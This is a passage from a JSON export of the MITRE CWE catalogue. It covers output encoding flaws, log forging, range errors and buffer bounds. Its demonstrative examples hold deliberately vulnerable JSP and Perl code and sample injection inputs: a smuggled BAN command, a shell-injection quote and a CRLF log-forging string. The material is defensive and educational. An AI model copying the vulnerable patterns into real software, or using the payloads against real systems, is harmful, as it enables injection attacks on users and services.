form.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"JSP"},"xhtml:div":{"#text":"<% String email = request.getParameter(\\"email\\"); %>...Email Address: <%= email %>","xhtml:br":["",""]}},"Body_Text":"The value read from the form parameter is reflected back to the client browser without having been encoded prior to output, allowing various XSS attacks (CWE-79)."},{"Intro_Text":"Consider a chat application in which a front-end web application communicates with a back-end server. The back-end is legacy code that does not perform authentication or authorization, so the front-end must implement it. The chat protocol supports two commands, SAY and BAN, although only administrators can use the BAN command. Each argument must be separated by a single space. The raw inputs are URL-encoded. The messaging protocol allows multiple commands to be specified on the same line if they are separated by a \\"|\\" character.","Body_Text":["First let\'s look at the back end command processor code","The front end web application receives a command, encodes it for sending to the server, performs the authorization check, and sends the command to the server.","It is clear that, while the protocol and back-end allow multiple commands to be sent in a single request, the front end only intends to send a single command. However, the UrlEncode function could leave the \\"|\\" character intact. If an attacker provides:","then the front end will see this is a \\"SAY\\" command, and the $argstr will look like \\"hello world | BAN user12\\". Since the command is \\"SAY\\", the check for the \\"BAN\\" command will fail, and the front end will send the URL-encoded command to the back end:","The back end, however, will treat these as two separate commands:","Notice, however, that if the front end properly encodes the \\"|\\" with \\"%7C\\", then the back end will only process a single command."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"$inputString = readLineFromFileHandle($serverFH);@commands = split(/\\\\|/, $inputString);foreach $cmd (@commands) {}","xhtml:br":["","","","",""],"xhtml:i":"# generate an array of strings separated by the \\"|\\" character.","xhtml:div":{"#text":"($operator, $args) = split(/ /, $cmd, 2);$args = UrlDecode($args);if ($operator eq \\"BAN\\") {}elsif ($operator eq \\"SAY\\") {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","",""],"xhtml:i":"# separate the operator from its arguments based on a single whitespace","xhtml:div":[{"#text":"ExecuteBan($args);","attr":{"@_style":"margin-left:10px;"}},{"#text":"ExecuteSay($args);","attr":{"@_style":"margin-left:10px;"}}]}}},{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"$inputString = GetUntrustedArgument(\\"command\\");($cmd, $argstr) = split(/\\\\s+/, $inputString, 2);$argstr =~ s/\\\\s+/ /gs;$argstr = UrlEncode($argstr);if (($cmd eq \\"BAN\\") && (! IsAdministrator($username))) {}$fh = GetServerFileHandle(\\"myserver\\");print $fh \\"$cmd $argstr\\\\n\\";","xhtml:br":["","","","","","","","","","","",""],"xhtml:i":["# removes extra whitespace and also changes CRLF\'s to spaces","# communicate with file server using a file handle"],"xhtml:div":{"#text":"die \\"Error: you are not the admin.\\\\n\\";","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"attack"},"xhtml:div":"SAY hello world|BAN user12"},{"attr":{"@_Nature":"result"},"xhtml:div":"SAY hello%20world|BAN%20user12"},{"attr":{"@_Nature":"result"},"xhtml:div":{"#text":"SAY hello worldBAN user12","xhtml:br":""}}]},{"Intro_Text":"This example takes user input, passes it through an encoding scheme and then creates a directory specified by the user.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"sub GetUntrustedInput {}sub encode {}sub doit {}","xhtml:div":[{"#text":"return($ARGV[0]);","attr":{"@_style":"margin-left:10px;"}},{"#text":"my($str) = @_;$str =~ s/\\\\&/\\\\&amp;/gs;$str =~ s/\\\\\\"/\\\\&quot;/gs;$str =~ s/\\\\\'/\\\\&apos;/gs;$str =~ s/\\\\</\\\\&lt;/gs;$str =~ s/\\\\>/\\\\&gt;/gs;return($str);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","",""]},{"#text":"my $uname = encode(GetUntrustedInput(\\"username\\"));print \\"<b>Welcome, $uname!</b><p>\\\\n\\";system(\\"cd /home/$uname; /bin/ls -l\\");","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]}],"xhtml:br":["","","",""]}},{"attr":{"@_Nature":"attack"},"xhtml:div":"\' pwd"}],"Body_Text":["The programmer attempts to encode dangerous characters, however the denylist for encoding is incomplete (CWE-184) and an attacker can still pass a semicolon, resulting in a chain with command injection (CWE-77).","Additionally, the encoding routine is used inappropriately with command execution. An attacker doesn\'t even need to insert their own semicolon. The attacker can instead leverage the encoding routine to provide the semicolon to separate the commands. If an attacker supplies a string of the form:","then the program will encode the apostrophe and insert the semicolon, which functions as a command separator when passed to the system function. This allows the attacker to complete the command injection."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-4636","Description":"OS command injection in backup software using shell metacharacters in a filename; correct behavior would require that this filename could not be changed.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4636"},{"Reference":"CVE-2008-0769","Description":"Web application does not set the charset when sending a page to a browser, allowing for XSS exploitation when a browser chooses an unexpected encoding.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0769"},{"Reference":"CVE-2008-0005","Description":"Program does not set the charset when sending a page to a browser, allowing for XSS exploitation when a browser chooses an unexpected encoding.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0005"},{"Reference":"CVE-2008-5573","Description":"SQL injection via password parameter; a strong password might contain \\"&\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5573"},{"Reference":"CVE-2008-3773","Description":"Cross-site scripting in chat application via a message subject, which normally might contain \\"&\\" and other XSS-related characters.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3773"},{"Reference":"CVE-2008-0757","Description":"Cross-site scripting in chat application via a message, which normally might be allowed to contain arbitrary content.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0757"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":22,"Entry_Name":"Improper Output Handling"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"IDS00-J","Entry_Name":"Sanitize untrusted data passed across a trust boundary","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"IDS05-J","Entry_Name":"Use a subset of ASCII for file and path names"},{"attr":{"@_Taxonomy_Name":"SEI CERT Oracle Coding Standard for Java"},"Entry_ID":"IDS00-J","Entry_Name":"Prevent SQL injection","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"IDS33-PL","Entry_Name":"Sanitize untrusted data passed across a trust boundary","Mapping_Fit":"Exact"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"104"}},{"attr":{"@_CAPEC_ID":"73"}},{"attr":{"@_CAPEC_ID":"81"}},{"attr":{"@_CAPEC_ID":"85"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-45"}},{"attr":{"@_External_Reference_ID":"REF-46"}},{"attr":{"@_External_Reference_ID":"REF-47"}},{"attr":{"@_External_Reference_ID":"REF-48"}},{"attr":{"@_External_Reference_ID":"REF-49"}},{"attr":{"@_External_Reference_ID":"REF-50"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 11, "Canonical Representation Issues" Page 363"}}]},"Notes":{"Note":[{"#text":"This weakness is primary to all weaknesses related to injection (CWE-74) since the inherent nature of injection involves the violation of structured messages.","attr":{"@_Type":"Relationship"}},{"attr":{"@_Type":"Relationship"},"xhtml:p":["CWE-116 and CWE-20 have a close association because, depending on the nature of the structured message, proper input validation can indirectly prevent special characters from changing the meaning of a structured message. For example, by validating that a numeric ID field should only contain the 0-9 characters, the programmer effectively prevents injection attacks.","However, input validation is not always sufficient, especially when less stringent data types must be supported, such as free-form text. Consider a SQL injection scenario in which a last name is inserted into a query. The name \\"O\'Reilly\\" would likely pass the validation step since it is a common last name in the English language. However, it cannot be directly inserted into the database because it contains the \\"\'\\" apostrophe character, which would need to be escaped or otherwise neutralized. In this case, stripping the apostrophe might reduce the risk of SQL injection, but it would produce incorrect behavior because the wrong name would be recorded."]},{"#text":"The usage of the \\"encoding\\" and \\"escaping\\" terms varies widely. For example, in some programming languages, the terms are used interchangeably, while other languages provide APIs that use both terms for different tasks. This overlapping usage extends to the Web, such as the \\"escape\\" JavaScript function whose purpose is stated to be encoding. The concepts of encoding and escaping predate the Web by decades. Given such a context, it is difficult for CWE to adopt a consistent vocabulary that will not be misinterpreted by some constituency.","attr":{"@_Type":"Terminology"}},{"#text":"This is a data/directive boundary error in which data boundaries are not sufficiently enforced before it is sent to a different control sphere.","attr":{"@_Type":"Theoretical"}},{"#text":"While many published vulnerabilities are related to insufficient output encoding, there is such an emphasis on input validation as a protection mechanism that the underlying causes are rarely described. Within CVE, the focus is primarily on well-understood issues like cross-site scripting and SQL injection. It is likely that this weakness frequently occurs in custom protocols that support multiple encodings, which are not necessarily detectable with automated techniques.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-07-19","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Likelihood_of_Exploit, Name, Observed_Examples, Potential_Mitigations, References, Relationship_Notes, Relationships, Research_Gaps, Terminology_Notes, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Detection_Factors, Potential_Mitigations, References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationship_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Likelihood_of_Exploit, References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships, Terminology_Notes"}],"Previous_Entry_Name":[{"#text":"Output Validation","attr":{"@_Date":"2008-04-11"}},{"#text":"Incorrect Output Sanitization","attr":{"@_Date":"2008-09-09"}},{"#text":"Insufficient Output Sanitization","attr":{"@_Date":"2009-01-12"}}]}},"117":{"attr":{"@_ID":"117","@_Name":"Improper Output Neutralization for Logs","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not neutralize or incorrectly neutralizes output that is written to logs.","Extended_Description":{"xhtml:p":["This can allow an attacker to forge log entries or inject malicious content into logs.","Log forging vulnerabilities occur when:"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ol":{"xhtml:li":["Data enters an application from an untrusted source.","The data is written to an application or system log file."]}}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"116","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":"Applications typically use log files to store a history of events or transactions for later review, statistics gathering, or debugging. Depending on the nature of the application, the task of reviewing log files may be performed manually on an as-needed basis or automated with a tool that automatically culls logs for important events or trending information."},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality","Availability","Non-Repudiation"],"Impact":["Modify Application Data","Hide Activities","Execute Unauthorized Code or Commands"],"Note":"Interpretation of the log files may be hindered or misdirected if an attacker can supply data to the application that is subsequently logged verbatim. In the most benign case, an attacker may be able to insert false entries into the log file by providing the application with input that includes appropriate characters. Forged or otherwise corrupted log files can be used to cover an attacker\'s tracks, possibly by skewing statistics, or even to implicate another party in the commission of a malicious act. If the log file is processed automatically, the attacker can render the file unusable by corrupting the format of the file or injecting unexpected characters. An attacker may inject code or other commands into the log file and take advantage of a vulnerability in the log processing utility."}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-30"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following web application code attempts to read an integer value from a request object. If the parseInt call fails, then the input is logged with an error message indicating what happened.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String val = request.getParameter(\\"val\\");try {}catch (NumberFormatException) {}...","xhtml:br":["","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int value = Integer.parseInt(val);","xhtml:br":""}},{"#text":"log.info(\\"Failed to parse val = \\" + val);","attr":{"@_style":"margin-left:10px;"}}]}},"Body_Text":["If a user submits the string \\"twenty-one\\" for val, the following entry is logged:",{"xhtml:ul":{"xhtml:li":{"xhtml:div":"INFO: Failed to parse val=twenty-one"}}},"However, if an attacker submits the string \\"twenty-one%0a%0aINFO:+User+logged+out%3dbadguy\\", the following entry is logged:",{"xhtml:ul":{"xhtml:li":[{"xhtml:div":"INFO: Failed to parse val=twenty-one"},{"xhtml:div":"INFO: User logged out=badguy"}]}},"Clearly, attackers can use this same mechanism to insert arbitrary log entries."]}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2006-4624","Description":"Chain: inject fake log entries with fake timestamps using CRLF injection","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4624"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Log Forging"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"IDS03-J","Entry_Name":"Do not log unsanitized user input","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"SEI CERT Oracle Coding Standard for Java"},"Entry_ID":"IDS03-J","Entry_Name":"Do not log unsanitized user input","Mapping_Fit":"Exact"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"268"}},{"attr":{"@_CAPEC_ID":"81"}},{"attr":{"@_CAPEC_ID":"93"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-52"}},{"attr":{"@_External_Reference_ID":"REF-53"}},{"attr":{"@_External_Reference_ID":"REF-43"}}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated References, Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, References, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Background_Details, Common_Consequences, Description, Other_Notes, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples, Description, Name, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences, Other_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Log Forging","attr":{"@_Date":"2008-04-11"}},{"#text":"Incorrect Output Sanitization for Logs","attr":{"@_Date":"2009-05-27"}},{"#text":"Improper Output Sanitization for Logs","attr":{"@_Date":"2010-06-21"}}]}},"118":{"attr":{"@_ID":"118","@_Name":"Incorrect Access of Indexable Resource (\'Range Error\')","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not restrict or incorrectly restricts operations within the boundaries of a resource that is accessed using an index or pointer, such as memory or files.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP8","Entry_Name":"Faulty Buffer Access"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"10"}},{"attr":{"@_CAPEC_ID":"14"}},{"attr":{"@_CAPEC_ID":"24"}},{"attr":{"@_CAPEC_ID":"45"}},{"attr":{"@_CAPEC_ID":"46"}},{"attr":{"@_CAPEC_ID":"47"}},{"attr":{"@_CAPEC_ID":"8"}},{"attr":{"@_CAPEC_ID":"9"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-07-19","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships, Time_of_Introduction"}],"Previous_Entry_Name":[{"#text":"Range Errors","attr":{"@_Date":"2008-09-09"}},{"#text":"Improper Access of Indexable Resource (aka \'Range Error\')","attr":{"@_Date":"2009-05-27"}},{"#text":"Improper Access of Indexable Resource (\'Range Error\')","attr":{"@_Date":"2017-05-03"}}]}},"119":{"attr":{"@_ID":"119","@_Name":"Improper Restriction of Operations within the Bounds of a Memory Buffer","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Stable"},"Description":"The software performs operations on a memory buffer, but it can read from or write to a memory location that is outside of the intended boundary of the buffer.","Extended_Description":{"xhtml:p":["Certain languages allow direct addressing of memory locations and do not automatically ensure that these locations are valid for the memory buffer that is being referenced. This can cause read or write operations to be performed on memory locations that may be associated with other variables, data structures, or internal program data.","As a result, an attacker may be able to execute arbitrary code, alter the intended control flow, read sensitive information, or cause the system to crash."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"118","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Often"}},{"attr":{"@_Name":"C++","@_Prevalence":"Often"}},{"attr":{"@_Class":"Assembly","@_Prevalence":"Undetermined"}}]},"Alternate_Terms":{"Alternate_Term":[{"Term":"Buffer Overflow","Description":"The \\"buffer overflow\\" term has many different meanings to different audiences. From a CWE mapping perspective, this term should be avoided where possible. Some researchers, developers, and tools intend for it to mean \\"write past the end of a buffer,\\" whereas other use the same term to mean \\"any read or write outside the boundaries of a buffer, whether before the beginning of the buffer or after the end of the buffer.\\" Still others using the same term could mean \\"any action after the end of a buffer, whether it is a read or write.\\" Since the term is commonly used for exploitation and for vulnerabilities, it further confuses things."},{"Term":"buffer overrun","Description":"Some prominent vendors and researchers use the term \\"buffer overrun,\\" but most people use \\"buffer overflow.\\" See the alternate term for \\"buffer overflow\\" for context."},{"Term":"memory safety","Description":"\\"Memory safety\\" is generally used for techniques that avoid weaknesses related to memory access, such as those identified by CWE-119 and its descendants. However, the term is not formal, and there is likely disagreement between practitioners as to which weaknesses are implicitly covered by the \\"memory safety\\" term."}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality","Availability"],"Impact":["Execute Unauthorized Code or Commands","Modify Memory"],"Note":"If the memory accessible by the attacker can be effectively controlled, it may be possible to execute arbitrary code, as with a standard buffer overflow. If the attacker can overwrite a pointer\'s worth of memory (usually 32 or 64 bits), they can redirect a function pointer to their own malicious code. Even when the attacker can only modify a single byte arbitrary code execution can be possible. Sometimes this is because the same problem can be exploited repeatedly to the same effect. Other times it is because the attacker can overwrite 